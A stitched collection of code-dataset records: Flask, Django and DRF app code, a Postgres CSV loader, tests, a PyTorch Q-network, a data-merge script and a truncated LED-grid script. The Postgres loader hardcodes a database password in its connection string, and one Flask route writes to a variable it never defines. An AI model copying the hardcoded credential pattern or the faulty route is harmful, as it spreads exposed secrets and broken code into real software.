fields\n\tget_image_data = request.get_json()\n\t# Check for nulls and whitespaces\n\ttry:\n\t\tget_int_user_id = int(get_image_data['user_id'])\n\texcept TypeError:\n\t\treturn {'error': 'User id must be numeric'}, 403\n\ttry:\n\t\tget_image_url = get_image_data['profileImg']\n\texcept TypeError:\n\t\treturn {'error': 'Please provide image URL'}, 403\n\n\t# Get collections\n\tprofile = mongo.db.profile\n\taws_tags = mongo.db.aws_tags\n\tuser = mongo.db.user\n\ttry:\n\t\tget_profile_id = int(profile.find().skip(profile.count_documents({}) - 1)[0]['profile_id'])+1\n\texcept ValueError:\n\t\tget_profile_id = 1\n\n\tuser_id_exists = user.count_documents({'user_id': get_int_user_id})\n\tprofile_id_exists = aws_tags.count_documents({'profile_id':get_profile_id })\n\tget_int_profile_id = int(profile_id_exists)\n\tif user_id_exists:\n\t\tget_tags = get_aws_tags(get_image_url)\n\t\turl = get_image_url.split(\".\")\n\t\tif url[3] == \"jpg\":\n\t\t\tget_prediction = predict(get_image_url) # changed to new_predict\n\t\telse:\n\t\t\tget_prediction['Long_Hair'] = { 'Value': False }\n\t\t\tget_prediction['Short_Hair'] = { 'Value': False }\n\t\t\tget_prediction['Indoor'] = { 'Value': False }\n\t\t\tget_prediction['Outdoor'] = { 'Value': False }\n\t\tif get_tags['Code'] == 2:\n\t\t\toutput = {'Code':2 , 'error':'Invalid Image, Please try another image'}\n\t\telif get_int_profile_id == 0:\n\t\t\toutput = {'Code': 1, 'success':get_tags}\n\t\t\taws_tags.insert_one({\n\t\t\t\t'profile_id': get_profile_id,\n\t\t\t\t'user_id': get_int_user_id,\n\t\t\t\t'AgeRange':get_tags['AgeRange'],\n\t\t\t\t'Smile':get_tags['Smile'],\n\t\t\t\t'Eyeglasses':get_tags['Eyeglasses'],\n\t\t\t\t'Sunglasses':get_tags['Sunglasses'],\n\t\t\t\t'Gender':get_tags['Gender'],\n\t\t\t\t'Beard':get_tags['Beard'],\n\t\t\t\t'Mustache':get_tags['Mustache'],\n\t\t\t\t'EyesOpen': get_tags['EyesOpen'],\n\t\t\t\t'MouthOpen': get_tags['MouthOpen'],\n\t\t\t\t'Emotions': get_tags['Emotions'],\n\t\t\t\t'ShortHair': get_prediction['Short_Hair'],\n\t\t\t\t'LongHair': get_prediction['Long_Hair'],\n\t\t\t\t'Indoor': get_prediction['Indoor'],\n\t\t\t\t'Outdoor': get_prediction['Outdoor']\n\t\t\t})\n\t\telse:\n\t\t\toutput = {'Code':3 , 'error':'entry for this profile_id already exists. profile_id:-'+ str(get_profile_id)}\n\telse:\n\t\toutput = {'Code':4 , 'error':'user_id does not exists'}\n\treturn output\n", "sub_path": "backend/project/aws/routes.py", "file_name": "routes.py", "file_ext": "py", "file_size_in_byte": 3208, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "Algorithmia.client", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 25, "usage_type": "name"}, {"api_name": "project.mongo.db", "line_number": 37, "usage_type": "attribute"}, {"api_name": "project.mongo", "line_number": 37, "usage_type": "name"}, {"api_name": "project.mongo.db", "line_number": 38, "usage_type": "attribute"}, {"api_name": "project.mongo", "line_number": 38, "usage_type": "name"}, {"api_name": "project.mongo.db", "line_number": 39, "usage_type": "attribute"}, {"api_name": "project.mongo", "line_number": 39, "usage_type": "name"}, {"api_name": "project.get_aws_tags", "line_number": 49, "usage_type": "call"}, {"api_name": "project.token_required", "line_number": 22, "usage_type": "name"}]}
+{"seq_id": "221979266", "text": "import psycopg2\nimport csv\nimport pandas\nfile = pandas.read_csv('IN.csv')\ndef connection():\n conn = psycopg2.connect(\"dbname='test1' user='postgres' password='KaranS@123' host='localhost' port='5432'\")\n cur = conn.cursor()\n cur.execute(\"CREATE TABLE mapping(key varchar PRIMARY KEY NOT NULL, place_name varchar, admin_name1 varchar, latitude DOUBLE PRECISION, longitude DOUBLE PRECISION, accuracy varchar)\")\n print(\"Records created successfully\")\n return cur,conn\ndef insert(cur,conn,key_pk,placename_pk,admin_name1_pk,latitude,longitude,accuracy):\n cur.execute(\"INSERT INTO mapping VALUES (%s,%s,%s,%s,%s,%s)\",(key_pk,placename_pk,admin_name1_pk,latitude,longitude,accuracy))\n conn.commit()\ncur,conn = connection()\nfor key_pk,placename_pk,admin_name1_pk,latitude,longitude,accuracy in zip(file['key'],file['place_name'],file['admin_name1'],file['latitude'],file[\"longitude\"],file['accuracy']):\n\tprint('inserting ' + key_pk + ' ' + placename_pk + ' ' + str(admin_name1_pk) + ' ' + str(latitude) + ' ' + str(longitude) +' ' + str(accuracy))\n\tif accuracy == 'Nan':\n\t\tinsert(cur,conn,key_pk,placename_pk,admin_name1_pk,latitude,longitude,0)\n\telse:\n\t\tinsert(cur,conn,key_pk,placename_pk,admin_name1_pk,latitude,longitude,accuracy)\nconn.close()\n", "sub_path": "table_creation.py", "file_name": "table_creation.py", "file_ext": "py", "file_size_in_byte": 1262, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "pandas.read_csv", "line_number": 4, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 6, "usage_type": "call"}]}
+{"seq_id": "313486791", "text": "\"\"\"mysite URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Import the include() function: from django.conf.urls import url, include\n 3. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\n\nfrom apps.Core.index import Index\n\nurlpatterns = [\n url(r'^admin/rq/', include('django_rq_dashboard.urls')),\n url(r'^admin/', admin.site.urls),\n url(r'^SSO/', include('apps.SSO.urls')),\n url(r'^AttendanceSystem/', include('apps.AttendanceSystem.urls')),\n url(r'^DownloadCenter/', include('apps.DownloadCenter.urls')),\n url(r'^Document/', include('apps.Document.urls')),\n url(r'^SupportTicketSystem/', include('apps.SupportTicketSystem.urls')),\n url(r'^BusinessSystem/', include('apps.BusinessSystem.urls')),\n url(r'^Equipment/', include('apps.Equipment.urls')),\n url(r'^IPAddress/', include('apps.IPAddress.urls')),\n url(r'^DayBook/', include('apps.DayBook.urls')),\n url(r'^NotebookPassword/', include('apps.NotebookPassword.urls')),\n url(r'^django-rq/', include('django_rq.urls')),\n url(r'^$', Index.as_view(), name=\"index\"),\n ] \\\n + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) \\\n + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n", "sub_path": "src/mysite/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 2090, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "django.conf.urls.url", "line_number": 25, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 25, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 26, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 26, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 26, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 27, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 27, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 28, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 28, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 29, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 29, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 30, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 30, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 31, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 31, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 32, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 32, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 33, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 33, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 34, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 34, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 35, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 35, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 36, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 36, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 37, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 37, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 38, "usage_type": "call"}, {"api_name": "apps.Core.index.Index.as_view", "line_number": 38, "usage_type": "call"}, {"api_name": "apps.Core.index.Index", "line_number": 38, "usage_type": "name"}, {"api_name": "django.conf.urls.static.static", "line_number": 40, "usage_type": "call"}, {"api_name": "django.conf.settings.STATIC_URL", "line_number": 40, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 40, "usage_type": "name"}, {"api_name": "django.conf.settings.STATIC_ROOT", "line_number": 40, "usage_type": "attribute"}, {"api_name": "django.conf.urls.static.static", "line_number": 41, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 41, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 41, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 41, "usage_type": "attribute"}]}
+{"seq_id": "594658793", "text": "\nfrom .models import Video\nfrom .serializers import VideModelSerializer\n\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom django.core.paginator import Paginator\n# Create your views here.\n\n\n\n@api_view(['GET'])\ndef get_videos(request):\n\n videos_data = Video.objects.all().order_by('-published_datetime')\n paginator = Paginator(videos_data, 10)\n page_number = request.GET.get('page', 1) \n videos_data = paginator.get_page(page_number)\n response = [VideModelSerializer(video_data).data for video_data in videos_data]\n return Response(response)\n\n@api_view(['GET'])\ndef search_videos(request):\n search_term = request.GET.get('search_term') or ''\n page_number = request.GET.get('page', 1)\n \n videos_title_data = Video.objects.filter(title__icontains=search_term)\n videos_title_data = set(record for record in videos_title_data)\n videos_description_data = Video.objects.filter(description__icontains=search_term)\n videos_description_data = set(record for record in videos_description_data)\n all_searched_videos_data = [record for record in videos_title_data.union(videos_description_data)]\n paginator = Paginator(all_searched_videos_data, 10)\n all_searched_videos_data = paginator.get_page(page_number)\n response = [VideModelSerializer(video_data).data for video_data in all_searched_videos_data]\n return Response(response)\n", "sub_path": "video_app/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1452, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "models.Video.objects.all", "line_number": 16, "usage_type": "call"}, {"api_name": "models.Video.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.Video", "line_number": 16, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 17, "usage_type": "call"}, {"api_name": "serializers.VideModelSerializer", "line_number": 20, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 21, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 13, "usage_type": "call"}, {"api_name": "models.Video.objects.filter", "line_number": 28, "usage_type": "call"}, {"api_name": "models.Video.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "models.Video", "line_number": 28, "usage_type": "name"}, {"api_name": "models.Video.objects.filter", "line_number": 30, "usage_type": "call"}, {"api_name": "models.Video.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "models.Video", "line_number": 30, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 33, "usage_type": "call"}, {"api_name": "serializers.VideModelSerializer", "line_number": 35, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 36, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "304293956", "text": "import pytest\nfrom django.urls import reverse\nfrom mock import patch\nfrom rest_framework import status\n\n\nclass TestHealthCheckView:\n @pytest.fixture\n def url(self):\n return reverse('core:health-check')\n\n def test_successful(self, anonymous_client, url):\n response = anonymous_client.get(path=url)\n\n assert response.status_code == status.HTTP_200_OK\n assert response.data == {'detail': 'healthy'}\n\n @patch('django.db.backends.utils.CursorWrapper.__enter__')\n def test_database_response_error(self, mock_cursor, anonymous_client, url):\n mock_cursor.return_value.fetchone.return_value = None\n response = anonymous_client.get(path=url)\n\n assert response.status_code == status.HTTP_500_INTERNAL_SERVER_ERROR\n assert response.data == {'detail': 'Database is not working: Invalid DB response'}\n\n @patch('core.views.cache')\n def test_cache_response_error(self, mock_cache, anonymous_client, url):\n mock_cache.get.return_value = None\n response = anonymous_client.get(path=url)\n\n assert response.status_code == status.HTTP_500_INTERNAL_SERVER_ERROR\n assert response.data == {'detail': 'Cache is not working: Invalid Cache response'}\n", "sub_path": "api/core/tests/test_views.py", "file_name": "test_views.py", "file_ext": "py", "file_size_in_byte": 1228, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "django.urls.reverse", "line_number": 10, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 8, "usage_type": "attribute"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 15, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 15, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_500_INTERNAL_SERVER_ERROR", "line_number": 23, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 23, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 18, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_500_INTERNAL_SERVER_ERROR", "line_number": 31, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 31, "usage_type": "name"}, {"api_name": "mock.patch", "line_number": 26, "usage_type": "call"}]}
+{"seq_id": "313135282", "text": "\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass QNetwork(nn.Module):\n\n def __init__(self, state_size, action_size):\n super(QNetwork, self).__init__()\n\n self.state_size = state_size\n self.action_size = action_size\n\n self.fc1 = nn.Linear(self.state_size, 64)\n self.d1 = nn.Dropout(p=0.25)\n self.fc2 = nn.Linear(64, 64)\n self.d2 = nn.Dropout(p=0.25)\n self.fc3 = nn.Linear(64, self.action_size)\n\n def forward(self, state):\n\n out = F.relu(self.fc1(state))\n out = self.d1(out)\n out = F.relu(self.fc2(out))\n out = self.d2(out)\n out = self.fc3(out)\n\n return out", "sub_path": "navigation/network.py", "file_name": "network.py", "file_ext": "py", "file_size_in_byte": 684, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "torch.nn.Module", "line_number": 6, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 6, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 24, "usage_type": "name"}]}
+{"seq_id": "351411438", "text": "#!/usr/bin/env python\n\nimport sys\nwater = sys.argv[1]\nenergy = sys.argv[2]\nif(len(sys.argv) == 3): #lack one argument for output\n output = sys.stdout #return the output to the STDOUT stream.\nelif(len(sys.argv) == 4): #satisfy the requirement\n output = open(sys.argv[3],\"w\")\nelse:\n print(\"Error! The number of arguments are false!\") #whether the arguments are less than 3 or larger than 4\n\ndef mergy_files(temperature_file, energy_file, output = \"output.csv\"):\n \"\"\"The main function is to read data from two arguments and then mergy\n the data by matching the closest time. At last, print it into a csv.file.\n \"\"\"\n import re\n import time\n import datetime\n\n if output == \"hw2-datamerge/.*.csv\": #prevent overwriting existing files unintentionally.\n print(\"Error! Overwrite existing files!\")\n\n with open(energy_file) as energy:\n energy_date = [] #a list to store the energy_date\n energy_value = [] #a list to store the energy_value\n energy_month = [] #a list to store the energy_month in order to check the order\n energy_day = [] #a list to store the energy_day in order to check the order\n energy_time = [] #a list to store the energy_time in order to check the format\n for line in energy:\n if re.search(r'^(\\d+).*',line):\n date = re.sub(r'^(\\d{4})-(\\d{2})-(\\d{2}).*', r'\\1-\\2-\\3', line) #get the date\n value = re.sub(r'.*(-\\d+),(\\d+)', r'\\2', line) #get the value\n month = re.sub(r'^(\\d{4})-(\\d{2})-(\\d{2}).*', r'\\2', line) #get the month\n day = re.sub(r'^(\\d{4})-(\\d{2})-(\\d{2}).*', r'\\3', line) #get the day\n time = re.sub(r'.* (\\d+:\\d+:\\d+).*(-\\d+).*', r'\\1,\\2', line) #get the time\n energy_date.append(date.rstrip()) #fill the energy_date list\n energy_value.append(value.rstrip()) #fill the energy_value list\n energy_month.append(month.rstrip()) #fill the energy_month list\n energy_day.append(day.rstrip()) #fill the energy_day list\n energy_time.append(time.rstrip()) #fill the energy_time list\n #print(energy_date)\n #print(energy_value)\n\n def check_time(time):\n \"\"\"This part is to check that all dates are at 00:00:00\n (midnight, morning of the given day, Wisconsin time).\n \"\"\"\n for i in range(len(time)):\n if not time[i] == \"00:00:00,-0500\": #check the time format\n print(\"Error! The time is not at midnight, the morning of the given day, Wisconsin time\")\n break\n check_time(energy_time)\n\n def check_order(month, day):\n \"\"\"This part is to check that dates are ordered.\n \"\"\"\n for i in range(len(month)-1):\n if month[i] > month[i+1]:\n print(\"ERROR! Dates are not ordered!\")\n break\n elif month[i] == month[i+1]:\n if day[i] > day[i+1]:\n print(\"ERROR! Dates are not ordered!\")\n break\n check_order(energy_month, energy_day)\n\n energy_date_conform = []\n for date in energy_date: #to make the energy_date have the same format as the water_temperature date\n date_conform = datetime.datetime.strptime(date, '%Y-%m-%d').strftime('%m/%d/%y')\n energy_date_conform.append(date_conform)\n\n with open(temperature_file) as water: #deal with the water_temperature file\n water_date = [] #a list to store the water_date\n water_value = [] #a list to store the water_value\n water_index = [] #a list to store the index as the first column of the output file\n for line in water:\n if re.search(r'^(\\d+).*', line):\n date = re.sub(r'\\d+,(.*),.*', r'\\1', line) #get the date\n value = re.sub(r'.*,(\\d+.*)', r'\\1', line) #get the value\n index = re.sub(r'(\\d+),.*', r'\\1', line) #get the index\n water_date.append(date.rstrip()) #fill the water_date list\n water_value.append(value.rstrip()) #fill the water_value list\n water_index.append(index.rstrip()) #fill the index list\n #print(water_date)\n #print(water_value)\n #print(energy_date_conform)\n water_date_conform = []\n for date in water_date: #get the water_date_conform having the same format with energy_date_conform\n newdate = re.sub(r'(\\d+)/(\\d+)/(\\d+)(.*)', r'\\1/\\2/\\3', date)\n water_date_conform.append(newdate)\n #print(water_date_conform)\n\n n_energy = 1 #set the n_energy value\n currentEnergyDay = energy_date_conform[n_energy-1] #set the current currentEnergyDay value\n water_energy_value = [] #a list to store the final value in the output file\n for i in range(len(water_date_conform)-1): #each row in water_temperature file\n if n_energy <= len(energy_date_conform): #i cannot be greater than len(water_date_conform)\n if water_date_conform[i] == currentEnergyDay:\n if water_date_conform[i+1] == currentEnergyDay:\n water_energy_value.append(\" \") #to those not the nearest time\n else:\n water_energy_value.append(str(int(energy_value[n_energy])/1000))\n n_energy += 1\n currentEnergyDay = energy_date_conform[n_energy-1] #those rows to put the value\n water_energy_value.append(\" \") #the last row\n\n #This part is to get the output.csv file\n output.write(\",\".join(['\"#\"','\"Date Time\"','\"Temperature\"','\"Energy Value(kWh)\"'])) #write the column name\n output.write(\"\\n\")\n for i in range(len(water_date_conform)):\n output.write(\",\".join([water_index[i],water_date[i],water_value[i],water_energy_value[i]]))\n output.write(\"\\n\")\n return\n\nif __name__==\"__main__\": #handle in the terminal\n mergy_files(water, energy, output)\n", "sub_path": "hw2/script/hw2_no_comma_last_column.py", "file_name": "hw2_no_comma_last_column.py", "file_ext": "py", "file_size_in_byte": 5912, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "sys.argv", "line_number": 4, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 5, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 6, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 8, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 9, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 31, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 32, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 33, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 34, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 35, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 36, "usage_type": "call"}, {"api_name": "time.rstrip", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 70, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 70, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 78, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 79, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 80, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 81, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 90, "usage_type": "call"}]}
+{"seq_id": "61118581", "text": "import argparse\nimport datetime\nimport math\nimport random\nimport textwrap\nimport time\nfrom threading import Timer\n\nfrom modules import badpixels, coloroverlay, colorutils\nfrom PIL import Image, ImageChops, ImageDraw, ImageEnhance, ImageFont, ImageOps\n\n\"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\n## Image layers\n\n\nclass unit:\n\n\txPos = 0\n\tyPos = 0\n\tbgColor = (0, 0, 0)\n\toutlineColor = (0, 0, 0)\n\ttileSizeWidth = 64\n\ttileSizeHeight = 32\n\tpercentDone = 100.0\n\tresistance = 50.0\n\tscore = 0\n\n\tdef __init__(self):\n\n\t\tself.unHideGrid = False\n\n\tdef createUnitImage(self):\n\t\tself.image = Image.new(\"RGBA\", (self.tileSizeWidth, self.tileSizeHeight))\n\t\tself.draw = ImageDraw.Draw(self.image)\n\n\tdef setUp(self):\n\t\tself.colOverlay = coloroverlay.ColorOverlay()\n\t\tself.colOverlay.randomSteps = True\n\t\tself.colOverlay.steps = self.config.steps\n\t\tself.colOverlay.maxBrightness = self.config.brightness\n\t\tself.colOverlay.tLimitBase = self.config.tLimitBase\n\n\t\t# self.score = 0 if random.random() > .5 else 1\n\n\t\tif self.useFixedPalette == True:\n\n\t\t\tself.colOverlay.minHue = self.palette[0]\n\t\t\tself.colOverlay.maxHue = self.palette[1]\n\t\t\tself.colOverlay.minSaturation = self.palette[2]\n\t\t\tself.colOverlay.maxSaturation = self.palette[3]\n\t\t\tself.colOverlay.minValue = self.palette[4]\n\t\t\tself.colOverlay.maxValue = self.palette[5]\n\t\t\tself.colOverlay.maxBrightness = self.colOverlay.maxValue\n\n\t\t\tself.colOverlay.dropHueMin = self.dropHueMin\n\t\t\tself.colOverlay.dropHueMax = self.dropHueMax\n\n\t\t\tself.colOverlay.colorB = [0, 0, 0]\n\t\t\tself.colOverlay.colorA = [0, 0, 0]\n\t\t\tself.colOverlay.currentColor = [0, 0, 0]\n\t\t\tself.colOverlay.autoChange = False\n\t\t\tself.colOverlay.randomRange = (\n\t\t\t\tself.colorStepsRangeMin,\n\t\t\t\tself.colorStepsRangeMax,\n\t\t\t)\n\n\t\t\tself.colOverlay.colorTransitionSetup()\n\n\tdef getNeighbours(self):\n\t\tN = []\n\t\tpreviousRow = self.row - 1\n\t\tnextRow = self.row + 1\n\t\tpreviousCol = self.col - 1\n\t\tnextCol = self.col + 1\n\n\t\tN.append((previousCol, previousRow))\n\t\tN.append((self.col, previousRow))\n\t\tN.append((nextCol, previousRow))\n\n\t\tN.append((previousCol, self.row))\n\t\tN.append((nextCol, self.row))\n\n\t\tN.append((previousCol, nextRow))\n\t\tN.append((self.col, nextRow))\n\t\tN.append((nextCol, nextRow))\n\n\t\treturn N\n\n\tdef drawUnit(self):\n\n\t\tself.colOverlay.stepTransition()\n\t\tself.bgColor = tuple(\n\t\t\tint(a * config.brightness) for a in (self.colOverlay.currentColor)\n\t\t)\n\n\t\tfontColor = self.bgColor\n\t\tfontColor = (0, 0, 0)\n\t\toutlineColor = self.bgColor\n\n\t\tif self.unHideGrid == True:\n\t\t\tfontColor = config.fontColor\n\t\t\toutlineColor = config.outlineColor\n\n\t\tif self.config.showOutline == False:\n\t\t\toutlineColor = self.bgColor\n\n\t\t\"\"\"\n\t\tif self.colOverlay.gotoNextTransition == True :\n\t\t\tif self.colOverlay.getPercentageDone() > 50 :\n\t\t\t\tif random.random() > .1 :\n\t\t\t\t\tself.colOverlay.colorTransitionSetup()\n\t\t\"\"\"\n\n\t\tself.draw.rectangle(\n\t\t\t(0, 0, self.tileSizeWidth - 1, self.tileSizeHeight - 1),\n\t\t\tfill=self.bgColor,\n\t\t\toutline=outlineColor,\n\t\t)\n\n\t\t# displyInfo = displyInfo.encode('utf-8')\n\t\tif self.config.showText == True:\n\t\t\t# u\"\\u000D\"\n\t\t\tdisplyInfo1 = str(self.col) + \", \" + str(self.row)\n\t\t\tdisplyInfo2 = (\n\t\t\t\tstr(self.col * self.tileSizeWidth)\n\t\t\t\t+ \", \"\n\t\t\t\t+ str(self.row * self.tileSizeHeight)\n\t\t\t)\n\t\t\tself.draw.text((2, -1), str(self.unitNumber), fontColor, font=config.font)\n\t\t\t# self.draw.text((2,- 1), (displyInfo1), fontColor, font=config.font)\n\t\t\t# self.draw.text((2,- 1 + config.fontSize), (displyInfo2), fontColor, font=config.font)\n\n\n\"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\"\"\"\" \"\"\n\n\ndef makeGrid():\n\tglobal config\n\tunitNumber = 1\n\tconfig.unitArray = []\n\tdel config.unitArray[:]\n\tconfig.gridArray = []\n\tconfig.gridArray = [[[] for i in range(config.rows)] for i in range(config.cols)]\n\n\tconfig.t1 = time.time()\n\tconfig.t2 = time.time()\n\tconfig.timeToComplete = round(random.uniform(120, 220))\n\n\tfor row in range(0, config.rows):\n\t\tfor col in range(0, config.cols):\n\t\t\tu = unit()\n\t\t\tu.config = config\n\t\t\tu.tileSizeWidth = config.tileSizeWidth\n\t\t\tu.tileSizeHeight = config.tileSizeHeight\n\t\t\tu.xPos = col * config.tileSizeWidth\n\t\t\tu.yPos = row * config.tileSizeHeight\n\t\t\tu.row = row\n\t\t\tu.col = col\n\t\t\tu.unitNumber = unitNumber\n\t\t\tu.useFixedPalette = config.useFixedPalette\n\t\t\tu.colorStepsRangeMin = config.colorStepsRangeMin\n\t\t\tu.colorStepsRangeMax = config.colorStepsRangeMax\n\n\t\t\tif config.useFixedPalette == True:\n\t\t\t\tif unitNumber <= config.paletteRange:\n\t\t\t\t\tu.palette = config.palette[\"p\" + str(unitNumber)]\n\t\t\t\telse:\n\t\t\t\t\tu.palette = config.palette[\"p\" + str(config.paletteRange)]\n\t\t\t\tu.dropHueMin = config.paletteDropHueMin\n\t\t\t\tu.dropHueMax = config.paletteDropHueMax\n\n\t\t\tu.createUnitImage()\n\t\t\tif config.coordinatedColorChange == False:\n\t\t\t\tu.setUp()\n\n\t\t\tu.bgColor = tuple(\n\t\t\t\tint(a * config.brightness) for a in (config.colOverlay.currentColor)\n\t\t\t)\n\t\t\tu.drawUnit()\n\t\t\tconfig.image.paste(u.image, (u.xPos + config.imageXOffset, u.yPos), u.image)\n\n\t\t\tconfig.unitArray.append(u)\n\t\t\tunitNumber += 1\n\t\t\tconfig.gridArray[col][row] = u\n\n\n# \"Conway Game of Life Like Redraw\"\n\"Conway Game of Life Like Redraw\"\n\n\ndef redrawGrid1():\n\n\tfor u in config.unitArray:\n\t\tu.bgColor = tuple(\n\t\t\tint(a * config.brightness) for a in (config.colOverlay.currentColor)\n\t\t)\n\t\tu.drawUnit()\n\t\tconfig.image.paste(u.image, (u.xPos + config.imageXOffset, u.yPos), u.image)\n\n\t\tif 